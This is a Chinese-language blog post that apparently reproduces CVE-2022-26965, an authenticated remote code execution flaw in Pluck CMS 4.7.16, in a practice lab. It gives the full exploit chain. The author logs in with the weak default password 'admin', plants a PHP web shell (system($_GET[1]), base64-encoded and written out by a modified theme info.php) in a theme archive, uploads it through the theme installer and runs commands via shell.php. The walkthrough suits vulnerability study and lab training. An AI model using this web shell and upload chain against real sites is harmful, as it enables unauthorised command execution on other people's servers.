Pluck-CMS-Pluck-4.7.16 远程代码执行漏洞(CVE-2022-26965)

漏洞简介

Pluck CMS 4.7.16 版本的远程代码执行(RCE)漏洞(CVE-2022-26965)。

该漏洞允许经过身份验证的用户通过 /admin.php?action=themeinstall 的主题上传功能执行任意代码。

漏洞细节

在 Pluck CMS 的管理界面中,管理员可以上传主题文件。

CMS在处理主题包时未隔离或限制文件写入操作,导致恶意代码被直接写入Web目录并执行。

漏洞利用

获取管理员权限:攻击者需要首先获取管理员账户的访问权限。
上传恶意主题:利用 /admin.php?action=themeinstall 页面上传包含恶意代码的主题文件。
执行代码:通过访问上传的恶意文件,攻击者可以在服务器上执行任意代码

漏洞复现

先利用弱口令admin登录

选择上传主题的功能点

找到上传点

然后利用cms主题构造木马,在github找到主题

https://github.com/billcreswell/redline-theme

下载压缩包 修改info.php文件

修改内容

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));

?>
file_put_contents() 函数:把一个字符串写入文件中。
 
base64_decode()对encoded_data进行解码,返回原始数据。
 
base64解码  PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg== 得到<?php system($_GET[1]);?>  

然后上传压缩包

然后访问/shell.php?1=ls

进行命令执行

春秋云镜的靶场好像无法用蚁剑连接,直接传参命令执行就可以了

posted @ 2025-05-09 20:43  Susen  阅读(125)  评论(0)    收藏  举报